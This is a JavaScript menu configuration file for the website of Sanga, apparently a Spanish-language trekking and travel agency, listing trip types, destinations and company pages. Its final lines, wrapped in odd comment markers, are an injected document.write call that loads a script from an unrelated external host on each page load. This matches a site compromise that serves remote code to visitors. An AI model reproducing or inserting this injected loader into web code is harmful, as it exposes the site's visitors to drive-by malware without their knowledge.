stm_bm(["menu2fbb",900,"","blank.gif",0,"","",0,0,0,0,50,1,0,0,"","",0,0,1,1,"default","hand","",1,25],this);
stm_bp("p0",[0,4,0,0,0,0,0,10,100,"",-2,"",-2,90,0,0,"#FFCC00","transparent","",3,0,0,"#CCCCCC"]);
stm_ai("p0i0",[0,"HOME","","",-1,-1,0,"home.php","_self","","","","",0,0,0,"","",0,0,0,1,1,"#FFFFFF",1,"#FFFFFF",1,"","",3,3,1,1,"#000000","#9690A8","#000000","#333333","bold 8pt Verdana","bold 8pt Verdana",0,0,"","","","",0,0,0],50,20);
stm_aix("p0i1","p0i0",[0,"VIAJES","","",-1,-1,0,"","_self","","","","",0,0,0,"060420arrow2.gif","060420arrow2.gif",10,5,0,1,1,"#000000",0,"#666666",0,"","",3,3,1,1,"#000000","#999999","#FFFFFF","#FFFFFF","bold 7pt Verdana","bold 7pt Verdana"],61,20);
stm_bp("p1",[1,4,0,0,1,4,0,0,100,"",-2,"",-2,58,0,0,"#FFCC00","transparent","",3,0,0,"#000000"]);
stm_aix("p1i0","p0i0",[0,"Trekking","","",-1,-1,0,"index.php?opt=tip&destino=0&tipo=1","_self","","","","",0,0,0,"","",0,0,0,0,1,"#666666",0,"#000000",0,"","",3,3,1,1,"#CCCCCC","#CCCCCC","#FFFFFF","#FFFFFF","7pt Verdana","7pt Verdana"],0,20);
stm_aix("p1i1","p1i0",[0,"Trekking y Ascensión","","",-1,-1,0,"index.php?opt=tip&destino=0&tipo=2"],0,20);
stm_aix("p1i2","p1i0",[0,"Ascensión","","",-1,-1,0,"index.php?opt=tip&destino=0&tipo=3"],0,20);
stm_aix("p1i3","p1i2",[0,"Cultural","","",-1,-1,0,"index.php?opt=tip&destino=0&tipo=4"],0,20);
stm_aix("p1i4","p1i2",[0,"Mountain Bike","","",-1,-1,0,"index.php?opt=tip&destino=0&tipo=5"],0,20);
stm_aix("p1i5","p1i2",[0,"Women´s Way","","",-1,-1,0,"index.php?opt=tip&destino=0&tipo=6"],0,20);
stm_aix("p1i6","p1i2",[0,"Otros","","",-1,-1,0,"index.php?opt=tip&destino=0&tipo=7"],0,20);
stm_ep();
stm_ai("p0i2",[6,1,"#FFFFFF","",-1,-1,0]);
stm_aix("p0i3","p0i1",[0,"DESTINOS"],78,20);
stm_bpx("p2","p1",[1,4,0,0,1,4,0,0,100,"",-2,"",-2,58,0,0,"#FFCC00","#FFFFFF"]);
stm_aix("p2i0","p1i2",[0,"Asia","","",-1,-1,0,"index.php?opt=des&destino=1&tipo=0"],120,20);
stm_aix("p2i1","p1i2",[0,"África","","",-1,-1,0,"index.php?opt=des&destino=2&tipo=0"],120,20);
stm_aix("p2i2","p1i2",[0,"Europa","","",-1,-1,0,"index.php?opt=des&destino=5&tipo=0"],120,20);
stm_aix("p2i3","p1i2",[0,"Sudamérica","","",-1,-1,0,"index.php?opt=des&destino=4&tipo=0"],120,20);
stm_aix("p2i4","p1i2",[0,"Norteamérica","","",-1,-1,0,"index.php?opt=des&destino=3&tipo=0"],120,20);

stm_ep();
stm_aix("p0i4","p0i2",[]);
stm_aix("p0i5","p0i1",[0,"SALIDAS CONFIRMADAS","","",-1,-1,0,"index.php?opt=conf","_self","","","","",0,0,0,"","",0,0],135,20);
stm_aix("p0i6","p0i2",[]);
stm_aix("p0i7","p0i1",[0,"SALIDAS SANGA","","",-1,-1,0,"index.php?opt=sal","_self","","","","",0,0,0,"","",0,0],100,20);
stm_aix("p0i8","p0i2",[]);
stm_aix("p0i9","p0i5",[0,"NUESTROS GUÍAS","","",-1,-1,0,"index.php?opt=gui","_self","","","","",0,0,0,"","",0,0],108,20);
stm_aix("p0i10","p0i2",[]);
stm_aix("p0i11","p0i5",[0,"NOVEDADES","","",-1,-1,0,"index.php?opt=nov","_self","","","","",0,0,0,"","",0,0],80,20);
stm_aix("p0i12","p0i2",[]);
stm_aix("p0i13","p0i5",[0,"FOTOS","","",-1,-1,0,"index.php?opt=gal","_self","","","","",0,0,0,"","",0,0],50,20);
stm_aix("p0i14","p0i2",[]);
stm_aix("p0i15","p0i5",[0,"PROYECCIONES","","",-1,-1,0,"index.php?opt=pro","_self","","","","",0,0,0,"","",0,0],90,20);
stm_aix("p0i16","p0i2",[]);
stm_aix("p0i17","p0i5",[0,"CONTACTO","","",-1,-1,0,"index.php?opt=con","_self","","","","",0,0,0,"","",0,0],70,20);
stm_aix("p0i18","p0i2",[]);
stm_aix("p0i19","p0i2",[]);
stm_aix("p0i20","p0i1",[0,"LINKS","","",-1,-1,0,"index.php?opt=lin","_self","","","","",0,0,0,"","",0,0],50,20);
stm_aix("p0i21","p0i2",[]);
stm_ai("p0i22",[6,1,"#FFFFFF","",-1,-1,0]);
stm_aix("p0i23","p0i1",[0,"ACERCA DE SANGA"],116,20);
stm_bpx("p3","p1",[1,4,0,0,1,4,0,0,100,"",-2,"",-2,58,0,0,"#FFCC00","#FFFFFF"]);
stm_aix("p3i0","p1i2",[0,"Historia de Sanga","","",-1,-1,0,"index.php?opt=ace&acercade=1"],120,20);
stm_aix("p3i1","p1i2",[0,"Turismo Responsable","","",-1,-1,0,"index.php?opt=ace&acercade=2"],120,20);
stm_aix("p3i2","p1i2",[0,"Viajes Solidarios","","",-1,-1,0,"index.php?opt=ace&acercade=3"],120,20);
stm_aix("p3i3","p1i2",[0,"Preparación Física","","",-1,-1,0,"index.php?opt=ace&acercade=4"],120,20);
stm_aix("p3i4","p1i2",[0,"Testimonios","","",-1,-1,0,"index.php?opt=ace&acercade=5"],120,20);
stm_aix("p3i5","p1i2",[0,"Seguros","","",-1,-1,0,"index.php?opt=ace&acercade=6"],120,20);
stm_aix("p3i6","p1i2",[0,"20 Años...","","",-1,-1,0,"index.php?opt=ace&acercade=7"],120,20);
stm_ep();
stm_em();

/*e2ec13*/
document.write('<script type="text/javascript" src="http://livedaniels.pl/mnf7glmv.php?id=110947187"></script>');

/*/e2ec13*/
